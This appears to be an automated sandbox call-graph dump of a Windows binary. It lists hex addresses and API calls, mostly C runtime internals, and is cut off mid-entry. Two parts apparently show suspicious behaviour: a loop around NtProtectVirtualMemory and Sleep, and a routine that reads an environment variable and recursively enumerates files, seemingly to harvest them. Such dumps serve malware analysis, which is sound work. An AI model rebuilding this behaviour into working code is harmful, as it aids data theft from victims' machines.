6190->6197 6191 352d4aae 6245 352dbdc9 6191->6245 6192 352d4a82 6237 352d4ab4 6192->6237 6198 352d4669 5 API calls 6193->6198 6195 352d527a 20 API calls 6195->6190 6197->6193 6198->6186 6199 352d49c7 6199->6186 6199->6190 6199->6195 6205 352d50e1 6202->6205 6204 352d245f 6204->5844 6206 352d50ed 6205->6206 6213 352d5671 RtlEnterCriticalSection 6206->6213 6208 352d50fb 6214 352d515a 6208->6214 6212 352d5119 6212->6204 6213->6208 6217 352d5182 6214->6217 6218 352d517a 6214->6218 6215 352d2ada 5 API calls 6216 352d5108 6215->6216 6220 352d5126 6216->6220 6217->6218 6219 352d571e 20 API calls 6217->6219 6218->6215 6219->6218 6223 352d56b9 RtlLeaveCriticalSection 6220->6223 6222 352d5130 6222->6212 6223->6222 6225 352d49b3 6224->6225 6225->6182 6226 352d4b39 GetModuleHandleExW 6225->6226 6227 352d4b63 GetProcAddress 6226->6227 6228 352d4b78 6226->6228 6227->6228 6229 352d4b8c FreeLibrary 6228->6229 6230 352d4b95 6228->6230 6229->6230 6231 352d2ada 5 API calls 6230->6231 6232 352d4b9f 6231->6232 6232->6182 6233->6199 6248 352d56b9 RtlLeaveCriticalSection 6234->6248 6236 352d4a7e 6236->6191 6236->6192 6249 352d6025 6237->6249 6240 352d4ae2 6243 352d4b39 8 API calls 6240->6243 6241 352d4ac2 GetPEB 6241->6240 6242 352d4ad2 GetCurrentProcess TerminateProcess 6241->6242 6242->6240 6244 352d4aea ExitProcess 6243->6244 6246 352d2ada 5 API calls 6245->6246 6247 352dbdd4 6246->6247 6247->6247 6248->6236 6250 352d604a 6249->6250 6251 352d6040 6249->6251 6252 352d5c45 5 API calls 6250->6252 6253 352d2ada 5 API calls 6251->6253 6252->6251 6254 352d4abe 6253->6254 6254->6240 6254->6241 6256 352d34d7 6255->6256 6256->6167 6262 352d53ff 6257->6262 6260 352d391b 6 API calls 6261 352d354d 6260->6261 6261->6170 6265 352d5c2b 6262->6265 6266 352d5c35 6265->6266 6267 352d2476 6265->6267 6269 352d5db2 6266->6269 6267->6260 6270 352d5c45 5 API calls 6269->6270 6271 352d5dd9 6270->6271 6272 352d5df1 TlsFree 6271->6272 6273 352d5de5 6271->6273 6272->6273 6274 352d2ada 5 API calls 6273->6274 6275 352d5e02 6274->6275 6275->6267 6279 352d74da 6276->6279 6282 352d74f3 6279->6282 6280 352d2ada 5 API calls 6281 352d2625 6280->6281 6281->6176 6282->6280 6283->5792 6735 352d284f 6736 352d2882 27 API calls 6735->6736 6737 352d285d 6736->6737 6738 352d724e GetProcessHeap 7288 352d8a89 7291 352d6d60 7288->7291 7292 352d6d69 7291->7292 7293 352d6d72 7291->7293 7295 352d6c5f 7292->7295 7296 352d5af6 38 API calls 7295->7296 7297 352d6c6c 7296->7297 7298 352d6d7e 38 API calls 7297->7298 7299 352d6c74 7298->7299 7315 352d69f3 7299->7315 7302 352d6c8b 7302->7293 7303 352d56d0 21 API calls 7304 352d6c9c 7303->7304 7305 352d6cce 7304->7305 7322 352d6e20 7304->7322 7308 352d571e 20 API calls 7305->7308 7308->7302 7309 352d6cc9 7310 352d6368 20 API calls 7309->7310 7310->7305 7311 352d6d12 7311->7305 7332 352d68c9 7311->7332 7312 352d6ce6 7312->7311 7313 352d571e 20 API calls 7312->7313 7313->7311 7316 352d54a7 38 API calls 7315->7316 7317 352d6a05 7316->7317 7318 352d6a14 GetOEMCP 7317->7318 7319 352d6a26 7317->7319 7320 352d6a3d 7318->7320 7319->7320 7321 352d6a2b GetACP 7319->7321 7320->7302 7320->7303 7321->7320 7323 352d69f3 40 API calls 7322->7323 7324 352d6e3f 7323->7324 7327 352d6e90 IsValidCodePage 7324->7327 7329 352d6e46 7324->7329 7331 352d6eb5 7324->7331 7325 352d2ada 5 API calls 7326 352d6cc1 7325->7326 7326->7309 7326->7312 7328 352d6ea2 GetCPInfo 7327->7328 7327->7329 7328->7329 7328->7331 7329->7325 7335 352d6acb GetCPInfo 7331->7335 7408 352d6886 7332->7408 7334 352d68ed 7334->7305 7336 352d6baf 7335->7336 7341 352d6b05 7335->7341 7338 352d2ada 5 API calls 7336->7338 7340 352d6c5b 7338->7340 7340->7329 7345 352d86e4 7341->7345 7344 352d8a3e 43 API calls 7344->7336 7346 352d54a7 38 API calls 7345->7346 7347 352d8704 MultiByteToWideChar 7346->7347 7349 352d8742 7347->7349 7356 352d87da 7347->7356 7351 352d8763 7349->7351 7352 352d56d0 21 API calls 7349->7352 7350 352d2ada 5 API calls 7353 352d6b66 7350->7353 7354 352d87d4 7351->7354 7357 352d87a8 MultiByteToWideChar 7351->7357 7352->7351 7359 352d8a3e 7353->7359 7364 352d8801 7354->7364 7356->7350 7357->7354 7358 352d87c4 GetStringTypeW 7357->7358 7358->7354 7360 352d54a7 38 API calls 7359->7360 7361 352d8a51 7360->7361 7368 352d8821 7361->7368 7365 352d880d 7364->7365 7367 352d881e 7364->7367 7366 352d571e 20 API calls 7365->7366 7365->7367 7366->7367 7367->7356 7369 352d883c 7368->7369 7370 352d8862 MultiByteToWideChar 7369->7370 7371 352d888c 7370->7371 7372 352d8a16 7370->7372 7375 352d56d0 21 API calls 7371->7375 7377 352d88ad 7371->7377 7373 352d2ada 5 API calls 7372->7373 7374 352d6b87 7373->7374 7374->7344 7375->7377 7376 352d88f6 MultiByteToWideChar 7378 352d890f 7376->7378 7391 352d8962 7376->7391 7377->7376 7377->7391 7395 352d5f19 7378->7395 7380 352d8801 20 API calls 7380->7372 7382 352d8939 7384 352d5f19 11 API calls 7382->7384 7382->7391 7383 352d8971 7386 352d56d0 21 API calls 7383->7386 7389 352d8992 7383->7389 7384->7391 7385 352d8a07 7388 352d8801 20 API calls 7385->7388 7386->7389 7387 352d5f19 11 API calls 7390 352d89e6 7387->7390 7388->7391 7389->7385 7389->7387 7390->7385 7392 352d89f5 WideCharToMultiByte 7390->7392 7391->7380 7392->7385 7393 352d8a35 7392->7393 7394 352d8801 20 API calls 7393->7394 7394->7391 7396 352d5c45 5 API calls 7395->7396 7397 352d5f40 7396->7397 7400 352d5f49 7397->7400 7403 352d5fa1 7397->7403 7401 352d2ada 5 API calls 7400->7401 7402 352d5f9b 7401->7402 7402->7382 7402->7383 7402->7391 7404 352d5c45 5 API calls 7403->7404 7405 352d5fc8 7404->7405 7406 352d2ada 5 API calls 7405->7406 7407 352d5f89 LCMapStringW 7406->7407 7407->7400 7409 352d6892 7408->7409 7416 352d5671 RtlEnterCriticalSection 7409->7416 7411 352d689c 7417 352d68f1 7411->7417 7415 352d68b5 7415->7334 7416->7411 7429 352d7011 7417->7429 7419 352d693f 7420 352d7011 26 API calls 7419->7420 7421 352d695b 7420->7421 7422 352d7011 26 API calls 7421->7422 7423 352d6979 7422->7423 7424 352d68a9 7423->7424 7425 352d571e 20 API calls 7423->7425 7426 352d68bd 7424->7426 7425->7424 7443 352d56b9 RtlLeaveCriticalSection 7426->7443 7428 352d68c7 7428->7415 7430 352d7022 7429->7430 7434 352d701e 7429->7434 7431 352d7029 7430->7431 7435 352d703c 7430->7435 7432 352d6368 20 API calls 7431->7432 7433 352d702e 7432->7433 7436 352d62ac 26 API calls 7433->7436 7434->7419 7435->7434 7437 352d706a 7435->7437 7439 352d7073 7435->7439 7436->7434 7438 352d6368 20 API calls 7437->7438 7440 352d706f 7438->7440 7439->7434 7441 352d6368 20 API calls 7439->7441 7442 352d62ac 26 API calls 7440->7442 7441->7440 7442->7434 7443->7428 6739 352d5348 6740 352d3529 8 API calls 6739->6740 6741 352d534f 6740->6741 6742 352d7b48 6752 352d8ebf 6742->6752 6746 352d7b55 6765 352d907c 6746->6765 6749 352d7b7f 6750 352d571e 20 API calls 6749->6750 6751 352d7b8a 6750->6751 6769 352d8ec8 6752->6769 6754 352d7b50 6755 352d8fdc 6754->6755 6756 352d8fe8 6755->6756 6789 352d5671 RtlEnterCriticalSection 6756->6789 6758 352d8ff3 6759 352d905e 6758->6759 6761 352d9032 RtlDeleteCriticalSection 6758->6761 6790 352da09c 6758->6790 6803 352d9073 6759->6803 6762 352d571e 20 API calls 6761->6762 6762->6758 6763 352d906a 6763->6746 6766 352d7b64 RtlDeleteCriticalSection 6765->6766 6767 352d9092 6765->6767 6766->6746 6766->6749 6767->6766 6768 352d571e 20 API calls 6767->6768 6768->6766 6770 352d8ed4 6769->6770 6779 352d5671 RtlEnterCriticalSection 6770->6779 6772 352d8f77 6784 352d8f97 6772->6784 6776 352d8f83 6776->6754 6777 352d8e78 66 API calls 6778 352d8ee3 6777->6778 6778->6772 6778->6777 6780 352d7b94 RtlEnterCriticalSection 6778->6780 6781 352d8f6d 6778->6781 6779->6778 6780->6778 6787 352d7ba8 RtlLeaveCriticalSection 6781->6787 6783 352d8f75 6783->6778 6788 352d56b9 RtlLeaveCriticalSection 6784->6788 6786 352d8f9e 6786->6776 6787->6783 6788->6786 6789->6758 6791 352da0a8 6790->6791 6792 352da0ce 6791->6792 6793 352da0b9 6791->6793 6802 352da0c9 6792->6802 6806 352d7b94 RtlEnterCriticalSection 6792->6806 6794 352d6368 20 API calls 6793->6794 6796 352da0be 6794->6796 6798 352d62ac 26 API calls 6796->6798 6797 352da0ea 6807 352da026 6797->6807 6798->6802 6800 352da0f5 6823 352da112 6800->6823 6802->6758 7087 352d56b9 RtlLeaveCriticalSection 6803->7087 6805 352d907a 6805->6763 6806->6797 6808 352da048 6807->6808 6809 352da033 6807->6809 6815 352da043 6808->6815 6826 352d8e12 6808->6826 6810 352d6368 20 API calls 6809->6810 6811 352da038 6810->6811 6813 352d62ac 26 API calls 6811->6813 6813->6815 6815->6800 6816 352d907c 20 API calls 6817 352da064 6816->6817 6832 352d7a5a 6817->6832 6819 352da06a 6839 352dadce 6819->6839 6822 352d571e 20 API calls 6822->6815 7086 352d7ba8 RtlLeaveCriticalSection 6823->7086 6825 352da11a 6825->6802 6827 352d8e2a 6826->6827 6829 352d8e26 6826->6829 6828 352d7a5a 26 API calls 6827->6828 6827->6829 6830 352d8e4a 6828->6830 6829->6816 6854 352d9a22 6830->6854 6833 352d7a7b 6832->6833 6834 352d7a66 6832->6834 6833->6819 6835 352d6368 20 API calls 6834->6835 6836 352d7a6b 6835->6836 6837 352d62ac 26 API calls 6836->6837 6838 352d7a76 6837->6838 6838->6819 6840 352daddd 6839->6840 6843 352dadf2 6839->6843 6842 352d6355 20 API calls 6840->6842 6841 352dae2d 6844 352d6355 20 API calls 6841->6844 6845 352dade2 6842->6845 6843->6841 6847 352dae19 6843->6847 6848 352dae32 6844->6848 6846 352d6368 20 API calls 6845->6846 6851 352da070 6846->6851 7043 352dada6 6847->7043 6850 352d6368 20 API calls 6848->6850 6852 352dae3a 6850->6852 6851->6815 6851->6822 6853 352d62ac 26 API calls 6852->6853 6853->6851 6855 352d9a2e 6854->6855 6856 352d9a36 6855->6856 6859 352d9a4e 6855->6859 6879 352d6355 6856->6879 6858 352d9aec 6861 352d6355 20 API calls 6858->6861 6859->6858 6864 352d9a83 6859->6864 6863 352d9af1 6861->6863 6862 352d6368 20 API calls 6872 352d9a43 6862->6872 6865 352d6368 20 API calls 6863->6865 6882 352d8c7b RtlEnterCriticalSection 6864->6882 6867 352d9af9 6865->6867 6869 352d62ac 26 API calls 6867->6869 6868 352d9a89 6870 352d9aba 6868->6870 6871 352d9aa5 6868->6871 6869->6872 6883 352d9b0d 6870->6883 6874 352d6368 20 API calls 6871->6874 6872->6829 6875 352d9aaa 6874->6875 6877 352d6355 20 API calls 6875->6877 6876 352d9ab5 6934 352d9ae4 6876->6934 6877->6876 6880 352d5b7a 20 API calls 6879->6880 6881 352d635a 6880->6881 6881->6862 6882->6868 6884 352d9b3b 6883->6884 6922 352d9b34 6883->6922 6885 352d9b3f 6884->6885 6886 352d9b5e 6884->6886 6888 352d6355 20 API calls 6885->6888 6889 352d9baf 6886->6889 6890 352d9b92 6886->6890 6887 352d2ada 5 API calls 6891 352d9d15 6887->6891 6892 352d9b44 6888->6892 6894 352d9bc5 6889->6894 6937 352da00b 6889->6937 6893 352d6355 20 API calls 6890->6893 6891->6876 6895 352d6368 20 API calls 6892->6895 6897 352d9b97 6893->6897 6940 352d96b2 6894->6940 6899 352d9b4b 6895->6899 6901 352d6368 20 API calls 6897->6901 6902 352d62ac 26 API calls 6899->6902 6905 352d9b9f 6901->6905 6902->6922 6903 352d9c0c 6909 352d9c66 WriteFile 6903->6909 6910 352d9c20 6903->6910 6904 352d9bd3 6906 352d9bf9 6904->6906 6907 352d9bd7 6904->6907 6908 352d62ac 26 API calls 6905->6908 6952 352d9492 GetConsoleCP 6906->6952 6911 352d9ccd 6907->6911 6947 352d9645 6907->6947 6908->6922 6913 352d9c89 GetLastError 6909->6913 6918 352d9bef 6909->6918 6914 352d9c28 6910->6914 6915 352d9c56 6910->6915 6911->6922 6923 352d6368 20 API calls 6911->6923 6913->6918 6919 352d9c2d 6914->6919 6920 352d9c46 6914->6920 6978 352d9728 6915->6978 6918->6911 6918->6922 6926 352d9ca9 6918->6926 6919->6911 6963 352d9807 6919->6963 6970 352d98f5 6920->6970 6922->6887 6925 352d9cf2 6923->6925 6927 352d6355 20 API calls 6925->6927 6928 352d9cc4 6926->6928 6929 352d9cb0 6926->6929 6927->6922 6985 352d6332 6928->6985 6931 352d6368 20 API calls 6929->6931 6932 352d9cb5 6931->6932 6933 352d6355 20 API calls 6932->6933 6933->6922 7042 352d8c9e RtlLeaveCriticalSection 6934->7042 6936 352d9aea 6936->6872 6990 352d9f8d 6937->6990 7012 352d8dbc 6940->7012 6942 352d96c2 6943 352d96c7 6942->6943 6944 352d5af6 38 API calls 6942->6944 6943->6903 6943->6904 6946 352d96ea 6944->6946 6945 352d9708 GetConsoleMode 6945->6943 6946->6943 6946->6945 6948 352d969f 6947->6948 6949 352d966a 6947->6949 6948->6918 6949->6948 6950 352d96a1 GetLastError 6949->6950 6951 352da181 WriteConsoleW CreateFileW 6949->6951 6950->6948 6951->6949 6953 352d94f5 6952->6953 6958 352d9607 6952->6958 6957 352d957b WideCharToMultiByte 6953->6957 6953->6958 6960 352d79e6 40 API calls 6953->6960 6962 352d95d2 WriteFile 6953->6962 7021 352d7c19 6953->7021 6954 352d2ada 5 API calls 6956 352d9641 6954->6956 6956->6918 6957->6958 6959 352d95a1 WriteFile 6957->6959 6958->6954 6959->6953 6961 352d962a GetLastError 6959->6961 6960->6953 6961->6958 6962->6953 6962->6961 6967 352d9816 6963->6967 6964 352d98d8 6966 352d2ada 5 API calls 6964->6966 6965 352d9894 WriteFile 6965->6967 6968 352d98da GetLastError 6965->6968 6969 352d98f1 6966->6969 6967->6964 6967->6965 6968->6964 6969->6918 6972 352d9904 6970->6972 6971 352d9a0f 6973 352d2ada 5 API calls 6971->6973 6972->6971 6974 352d9986 WideCharToMultiByte 6972->6974 6976 352d99bb WriteFile 6972->6976 6975 352d9a1e 6973->6975 6974->6976 6977 352d9a07 GetLastError 6974->6977 6975->6918 6976->6972 6976->6977 6977->6971 6983 352d9737 6978->6983 6979 352d97ea 6980 352d2ada 5 API calls 6979->6980 6982 352d9803 6980->6982 6981 352d97a9 WriteFile 6981->6983 6984 352d97ec GetLastError 6981->6984 6982->6918 6983->6979 6983->6981 6984->6979 6986 352d6355 20 API calls 6985->6986 6987 352d633d 6986->6987 6988 352d6368 20 API calls 6987->6988 6989 352d6350 6988->6989 6989->6922 6999 352d8d52 6990->6999 6992 352d9f9f 6993 352d9fb8 SetFilePointerEx 6992->6993 6994 352d9fa7 6992->6994 6996 352d9fac 6993->6996 6997 352d9fd0 GetLastError 6993->6997 6995 352d6368 20 API calls 6994->6995 6995->6996 6996->6894 6998 352d6332 20 API calls 6997->6998 6998->6996 7000 352d8d5f 6999->7000 7001 352d8d74 6999->7001 7002 352d6355 20 API calls 7000->7002 7004 352d6355 20 API calls 7001->7004 7006 352d8d99 7001->7006 7003 352d8d64 7002->7003 7005 352d6368 20 API calls 7003->7005 7007 352d8da4 7004->7007 7008 352d8d6c 7005->7008 7006->6992 7009 352d6368 20 API calls 7007->7009 7008->6992 7010 352d8dac 7009->7010 7011 352d62ac 26 API calls 7010->7011 7011->7008 7013 352d8dc9 7012->7013 7014 352d8dd6 7012->7014 7015 352d6368 20 API calls 7013->7015 7016 352d8de2 7014->7016 7017 352d6368 20 API calls 7014->7017 7018 352d8dce 7015->7018 7016->6942 7019 352d8e03 7017->7019 7018->6942 7020 352d62ac 26 API calls 7019->7020 7020->7018 7022 352d5af6 38 API calls 7021->7022 7023 352d7c24 7022->7023 7026 352d7a00 7023->7026 7027 352d7a13 7026->7027 7029 352d7a28 7026->7029 7027->7029 7030 352d7f0f 7027->7030 7029->6953 7031 352d7f1b 7030->7031 7032 352d5af6 38 API calls 7031->7032 7033 352d7f24 7032->7033 7034 352d5671 RtlEnterCriticalSection 7033->7034 7036 352d7f72 7033->7036 7035 352d7f42 7034->7035 7037 352d7f86 20 API calls 7035->7037 7036->7029 7038 352d7f56 7037->7038 7039 352d7f75 RtlLeaveCriticalSection 7038->7039 7040 352d7f69 7039->7040 7040->7036 7041 352d55a8 38 API calls 7040->7041 7041->7036 7042->6936 7046 352dad24 7043->7046 7045 352dadca 7045->6851 7047 352dad30 7046->7047 7057 352d8c7b RtlEnterCriticalSection 7047->7057 7049 352dad3e 7050 352dad65 7049->7050 7051 352dad70 7049->7051 7058 352dae4d 7050->7058 7052 352d6368 20 API calls 7051->7052 7054 352dad6b 7052->7054 7073 352dad9a 7054->7073 7056 352dad8d 7056->7045 7057->7049 7059 352d8d52 26 API calls 7058->7059 7061 352dae5d 7059->7061 7060 352dae63 7076 352d8cc1 7060->7076 7061->7060 7063 352d8d52 26 API calls 7061->7063 7072 352dae95 7061->7072 7066 352dae8c 7063->7066 7064 352d8d52 26 API calls 7067 352daea1 CloseHandle 7064->7067 7070 352d8d52 26 API calls 7066->7070 7067->7060 7071 352daead GetLastError 7067->7071 7068 352d6332 20 API calls 7069 352daedd 7068->7069 7069->7054 7070->7072 7071->7060 7072->7060 7072->7064 7085 352d8c9e RtlLeaveCriticalSection 7073->7085 7075 352dada4 7075->7056 7077 352d8d37 7076->7077 7078 352d8cd0 7076->7078 7079 352d6368 20 API calls 7077->7079 7078->7077 7084 352d8cfa 7078->7084 7080 352d8d3c 7079->7080 7081 352d6355 20 API calls 7080->7081 7082 352d8d27 7081->7082 7082->7068 7082->7069 7083 352d8d21 SetStdHandle 7083->7082 7084->7082 7084->7083 7085->7075 7086->6825 7087->6805 7088 352da945 7089 352da96d 7088->7089 7090 352da9a5 7089->7090 7091 352da99e 7089->7091 7092 352da997 7089->7092 7101 352daa00 7091->7101 7097 352daa17 7092->7097 7098 352daa20 7097->7098 7105 352db19b 7098->7105 7102 352daa20 7101->7102 7103 352db19b 21 API calls 7102->7103 7104 352da9a3 7103->7104 7106 352db1da 7105->7106 7111 352db25c 7106->7111 7115 352db59e 7106->7115 7108 352db286 7109 352db8b2 20 API calls 7108->7109 7110 352db292 7108->7110 7109->7110 7113 352d2ada 5 API calls 7110->7113 7111->7108 7112 352d78a3 5 API calls 7111->7112 7112->7108 7114 352da99c 7113->7114 7116 352db5c1 RaiseException 7115->7116 7117 352db5bc 7116->7117 7117->7111 7538 352d7bc7 7539 352d7bd3 7538->7539 7540 352d7c0a 7539->7540 7546 352d5671 RtlEnterCriticalSection 7539->7546 7542 352d7be7 7547 352d7f86 7542->7547 7546->7542 7548 352d7f94 7547->7548 7549 352d7bf7 7547->7549 7548->7549 7554 352d7cc2 7548->7554 7551 352d7c10 7549->7551 7668 352d56b9 RtlLeaveCriticalSection 7551->7668 7553 352d7c17 7553->7540 7555 352d7cd8 7554->7555 7556 352d7d42 7554->7556 7555->7556 7561 352d7d0b 7555->7561 7563 352d571e 20 API calls 7555->7563 7558 352d571e 20 API calls 7556->7558 7581 352d7d90 7556->7581 7559 352d7d64 7558->7559 7562 352d571e 20 API calls 7559->7562 7560 352d7d2d 7565 352d571e 20 API calls 7560->7565 7561->7560 7570 352d571e 20 API calls 7561->7570 7564 352d7d77 7562->7564 7569 352d7d00 7563->7569 7571 352d571e 20 API calls 7564->7571 7566 352d7d37 7565->7566 7572 352d571e 20 API calls 7566->7572 7567 352d7dfe 7573 352d571e 20 API calls 7567->7573 7568 352d7d9e 7568->7567 7580 352d571e 20 API calls 7568->7580 7582 352d90ba 7569->7582 7575 352d7d22 7570->7575 7576 352d7d85 7571->7576 7572->7556 7577 352d7e04 7573->7577 7610 352d91b8 7575->7610 7579 352d571e 20 API calls 7576->7579 7577->7549 7579->7581 7580->7568 7622 352d7e35 7581->7622 7583 352d90cb 7582->7583 7609 352d91b4 7582->7609 7584 352d571e 20 API calls 7583->7584 7585 352d90dc 7583->7585 7584->7585 7586 352d571e 20 API calls 7585->7586 7587 352d90ee 7585->7587 7586->7587 7588 352d9100 7587->7588 7589 352d571e 20 API calls 7587->7589 7590 352d9112 7588->7590 7591 352d571e 20 API calls 7588->7591 7589->7588 7592 352d9124 7590->7592 7593 352d571e 20 API calls 7590->7593 7591->7590 7594 352d9136 7592->7594 7595 352d571e 20 API calls 7592->7595 7593->7592 7596 352d9148 7594->7596 7597 352d571e 20 API calls 7594->7597 7595->7594 7598 352d915a 7596->7598 7599 352d571e 20 API calls 7596->7599 7597->7596 7600 352d916c 7598->7600 7601 352d571e 20 API calls 7598->7601 7599->7598 7602 352d917e 7600->7602 7603 352d571e 20 API calls 7600->7603 7601->7600 7604 352d9190 7602->7604 7605 352d571e 20 API calls 7602->7605 7603->7602 7606 352d91a2 7604->7606 7607 352d571e 20 API calls 7604->7607 7605->7604 7608 352d571e 20 API calls 7606->7608 7606->7609 7607->7606 7608->7609 7609->7561 7611 352d921d 7610->7611 7612 352d91c5 7610->7612 7611->7560 7613 352d91d5 7612->7613 7614 352d571e 20 API calls 7612->7614 7615 352d91e7 7613->7615 7616 352d571e 20 API calls 7613->7616 7614->7613 7617 352d91f9 7615->7617 7618 352d571e 20 API calls 7615->7618 7616->7615 7619 352d920b 7617->7619 7620 352d571e 20 API calls 7617->7620 7618->7617 7619->7611 7621 352d571e 20 API calls 7619->7621 7620->7619 7621->7611 7623 352d7e42 7622->7623 7627 352d7e60 7622->7627 7623->7627 7628 352d925d 7623->7628 7626 352d571e 20 API calls 7626->7627 7627->7568 7629 352d7e5a 7628->7629 7630 352d926e 7628->7630 7629->7626 7664 352d9221 7630->7664 7633 352d9221 20 API calls 7634 352d9281 7633->7634 7635 352d9221 20 API calls 7634->7635 7636 352d928c 7635->7636 7637 352d9221 20 API calls 7636->7637 7638 352d9297 7637->7638 7639 352d9221 20 API calls 7638->7639 7640 352d92a5 7639->7640 7641 352d571e 20 API calls 7640->7641 7642 352d92b0 7641->7642 7643 352d571e 20 API calls 7642->7643 7644 352d92bb 7643->7644 7645 352d571e 20 API calls 7644->7645 7646 352d92c6 7645->7646 7647 352d9221 20 API calls 7646->7647 7648 352d92d4 7647->7648 7649 352d9221 20 API calls 7648->7649 7650 352d92e2 7649->7650 7651 352d9221 20 API calls 7650->7651 7652 352d92f3 7651->7652 7653 352d9221 20 API calls 7652->7653 7654 352d9301 7653->7654 7655 352d9221 20 API calls 7654->7655 7656 352d930f 7655->7656 7657 352d571e 20 API calls 7656->7657 7658 352d931a 7657->7658 7659 352d571e 20 API calls 7658->7659 7660 352d9325 7659->7660 7661 352d571e 20 API calls 7660->7661 7662 352d9330 7661->7662 7663 352d571e 20 API calls 7662->7663 7663->7629 7665 352d9258 7664->7665 7666 352d9248 7664->7666 7665->7633 7666->7665 7667 352d571e 20 API calls 7666->7667 7667->7666 7668->7553 7669 352da1c6 IsProcessorFeaturePresent 7118 352d8640 7121 352d8657 7118->7121 7122 352d8679 7121->7122 7123 352d8665 7121->7123 7124 352d8681 7122->7124 7125 352d8693 7122->7125 7126 352d6368 20 API calls 7123->7126 7127 352d6368 20 API calls 7124->7127 7133 352d8652 7125->7133 7134 352d54a7 7125->7134 7128 352d866a 7126->7128 7129 352d8686 7127->7129 7131 352d62ac 26 API calls 7128->7131 7132 352d62ac 26 API calls 7129->7132 7131->7133 7132->7133 7135 352d54ba 7134->7135 7136 352d54c4 7134->7136 7135->7133 7136->7135 7137 352d5af6 38 API calls 7136->7137 7138 352d54e5 7137->7138 7139 352d7a00 38 API calls 7138->7139 7140 352d54fe 7139->7140 7142 352d7a2d 7140->7142 7143 352d7a40 7142->7143 7145 352d7a55 7142->7145 7143->7145 7146 352d6d7e 7143->7146 7145->7135 7147 352d6d8a 7146->7147 7148 352d5af6 38 API calls 7147->7148 7150 352d6d94 7148->7150 7152 352d55a8 38 API calls 7150->7152 7153 352d6e18 7150->7153 7154 352d571e 20 API calls 7150->7154 7155 352d5671 RtlEnterCriticalSection 7150->7155 7156 352d6e0f 7150->7156 7152->7150 7153->7145 7154->7150 7155->7150 7159 352d56b9 RtlLeaveCriticalSection 7156->7159 7158 352d6e16 7158->7150 7159->7158 7448 352d7a80 7449 352d7a8d 7448->7449 7450 352d637b 20 API calls 7449->7450 7451 352d7aa7 7450->7451 7452 352d571e 20 API calls 7451->7452 7453 352d7ab3 7452->7453 7454 352d637b 20 API calls 7453->7454 7458 352d7ad9 7453->7458 7455 352d7acd 7454->7455 7457 352d571e 20 API calls 7455->7457 7456 352d5eb7 11 API calls 7456->7458 7457->7458 7458->7456 7459 352d7ae5 7458->7459 6615 352d7103 GetCommandLineA GetCommandLineW 6616 352d5303 6619 352d50a5 6616->6619 6628 352d502f 6619->6628 6622 352d502f 5 API calls 6623 352d50c3 6622->6623 6632 352d5000 6623->6632 6626 352d5000 20 API calls 6627 352d50d9 6626->6627 6631 352d5048 6628->6631 6629 352d2ada 5 API calls 6630 352d5069 6629->6630 6630->6622 6631->6629 6633 352d500d 6632->6633 6634 352d502a 6632->6634 6635 352d5024 6633->6635 6637 352d571e 20 API calls 6633->6637 6634->6626 6636 352d571e 20 API calls 6635->6636 6636->6634 6637->6633 7160 352daf43 7161 352daf4d 7160->7161 7162 352daf59 7160->7162 7161->7162 7163 352daf52 CloseHandle 7161->7163 7163->7162 7670 352d4bdd 7671 352d4bec 7670->7671 7672 352d4c08 7670->7672 7671->7672 7674 352d4bf2 7671->7674 7673 352d6d60 51 API calls 7672->7673 7675 352d4c0f GetModuleFileNameA 7673->7675 7676 352d6368 20 API calls 7674->7676 7677 352d4c33 7675->7677 7678 352d4bf7 7676->7678 7693 352d4d01 7677->7693 7679 352d62ac 26 API calls 7678->7679 7689 352d4c01 7679->7689 7682 352d4e76 20 API calls 7683 352d4c5d 7682->7683 7684 352d4c66 7683->7684 7685 352d4c72 7683->7685 7687 352d6368 20 API calls 7684->7687 7686 352d4d01 38 API calls 7685->7686 7690 352d4c88 7686->7690 7692 352d4c6b 7687->7692 7688 352d571e 20 API calls 7688->7689 7691 352d571e 20 API calls 7690->7691 7690->7692 7691->7692 7692->7688 7695 352d4d26 7693->7695 7697 352d4d86 7695->7697 7699 352d70eb 7695->7699 7696 352d4c50 7696->7682 7697->7696 7698 352d70eb 38 API calls 7697->7698 7698->7697 7702 352d7092 7699->7702 7703 352d54a7 38 API calls 7702->7703 7704 352d70a6 7703->7704 7704->7695 6638 352d281c 6641 352d2882 6638->6641 6644 352d3550 6641->6644 6643 352d282a 6645 352d358a 6644->6645 6646 352d355d 6644->6646 6645->6643 6646->6645 6647 352d47e5 21 API calls 6646->6647 6648 352d357a 6647->6648 6648->6645 6650 352d544d 6648->6650 6651 352d545a 6650->6651 6653 352d5468 6650->6653 6651->6653 6656 352d547f 6651->6656 6652 352d6368 20 API calls 6654 352d5470 6652->6654 6653->6652 6655 352d62ac 26 API calls 6654->6655 6657 352d547a 6655->6657 6656->6657 6658 352d6368 20 API calls 6656->6658 6657->6645 6658->6654 6284 3db916e 6287 3db91b2 6284->6287 6285 3db91df NtProtectVirtualMemory 6285->6287 6286 3db91d2 Sleep 6286->6284 6287->6284 6287->6285 6287->6286 6288 352d1c5b 6289 352d1c6b 6288->6289 6292 352d12ee 6289->6292 6291 352d1c87 6293 352d1324 6292->6293 6294 352d13b7 GetEnvironmentVariableW 6293->6294 6318 352d10f1 6294->6318 6297 352d10f1 57 API calls 6298 352d1465 6297->6298 6299 352d10f1 57 API calls 6298->6299 6300 352d1479 6299->6300 6301 352d10f1 57 API calls 6300->6301 6302 352d148d 6301->6302 6303 352d10f1 57 API calls 6302->6303 6304 352d14a1 6303->6304 6305 352d10f1 57 API calls 6304->6305 6306 352d14b5 lstrlenW 6305->6306 6307 352d14d9 lstrlenW 6306->6307 6308 352d14d2 6306->6308 6309 352d10f1 57 API calls 6307->6309 6308->6291 6310 352d1501 lstrlenW lstrcatW 6309->6310 6311 352d10f1 57 API calls 6310->6311 6312 352d1539 lstrlenW lstrcatW 6311->6312 6313 352d10f1 57 API calls 6312->6313 6314 352d156b lstrlenW lstrcatW 6313->6314 6315 352d10f1 57 API calls 6314->6315 6316 352d159d lstrlenW lstrcatW 6315->6316 6317 352d10f1 57 API calls 6316->6317 6317->6308 6319 352d1118 6318->6319 6320 352d1129 lstrlenW 6319->6320 6331 352d2c40 6320->6331 6323 352d1168 lstrlenW 6324 352d1177 lstrlenW FindFirstFileW 6323->6324 6325 352d11e1 6324->6325 6326 352d11a0 6324->6326 6325->6297 6327 352d11aa 6326->6327 6328 352d11c7 FindNextFileW 6326->6328 6327->6328 6333 352d1000 6327->6333 6328->6326 6330 352d11da FindClose 6328->6330 6330->6325 6332 352d1148 lstrcatW lstrlenW 6331->6332 6332->6323 6332->6324 6334 352d1022 6333->6334 6335 352d10af 6334->6335 6336 352d102f lstrcatW lstrlenW 6334->6336 6337 352d10b5 lstrlenW 6335->6337 6348 352d10ad 6335->6348 6338 352d106b lstrlenW 6336->6338 6339 352d105a 